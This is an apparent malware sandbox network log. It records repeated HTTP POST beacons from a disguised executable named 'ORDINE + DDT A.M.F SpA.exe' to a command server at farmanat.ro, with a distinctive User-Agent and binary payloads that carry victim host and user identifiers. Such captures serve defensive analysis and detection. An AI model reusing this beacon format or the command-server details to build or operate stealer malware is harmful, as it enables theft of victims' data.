Nov 25, 2021 10:51:58.081695080 CET	6943	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:58.115756035 CET	6943	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:58.168097019 CET	6943	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
449	192.168.11.20	50293	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:58.603737116 CET	6944	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:58.637248039 CET	6944	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:58.693893909 CET	6944	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.11.20	49881	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:30.618581057 CET	6372	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:30.652806044 CET	6373	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:30.704024076 CET	6373	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
450	192.168.11.20	50294	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:59.123734951 CET	6945	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:59.157299995 CET	6945	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:59.211723089 CET	6946	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
451	192.168.11.20	50295	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:59.583120108 CET	6946	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:59.616615057 CET	6947	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:59.666563988 CET	6947	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
452	192.168.11.20	50296	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:00.084925890 CET	6948	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:00.119179964 CET	6948	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:00.179145098 CET	6948	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
453	192.168.11.20	50297	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:00.618988991 CET	6949	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:00.652857065 CET	6949	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:00.706468105 CET	6950	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
454	192.168.11.20	50298	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:01.143884897 CET	6950	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:01.177536964 CET	6951	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:01.226968050 CET	6951	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
455	192.168.11.20	50299	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:01.658061028 CET	6952	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:01.692475080 CET	6952	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:01.742136002 CET	6952	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
456	192.168.11.20	50300	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:02.188968897 CET	6953	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:02.223208904 CET	6953	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:02.275688887 CET	6954	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
457	192.168.11.20	50301	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:02.707520962 CET	6954	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:02.741075039 CET	6955	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:02.795593977 CET	6955	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
458	192.168.11.20	50302	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:03.225980043 CET	6956	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:03.260158062 CET	6956	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:03.310566902 CET	6956	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
459	192.168.11.20	50303	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:03.735457897 CET	6957	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:03.768945932 CET	6957	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:03.818984985 CET	6958	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.11.20	49882	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:31.231230021 CET	6374	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:31.265408039 CET	6374	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:31.317507029 CET	6374	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
460	192.168.11.20	50304	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:04.214606047 CET	6958	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:04.249846935 CET	6959	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:04.306943893 CET	6959	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
461	192.168.11.20	50305	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:04.684537888 CET	6960	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:04.718717098 CET	6960	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:04.768456936 CET	6960	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
462	192.168.11.20	50306	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:05.176481009 CET	6961	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:05.210149050 CET	6961	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:05.259536028 CET	6962	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
463	192.168.11.20	50307	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:05.687913895 CET	6962	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:05.722067118 CET	6963	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:05.790992975 CET	6963	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
464	192.168.11.20	50308	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:06.226742983 CET	6964	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:06.260984898 CET	6964	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:06.311167002 CET	6964	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
465	192.168.11.20	50309	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:06.742991924 CET	6965	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:06.776707888 CET	6965	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:06.825978041 CET	6966	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
466	192.168.11.20	50310	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:07.216253042 CET	6966	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:07.250541925 CET	6967	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
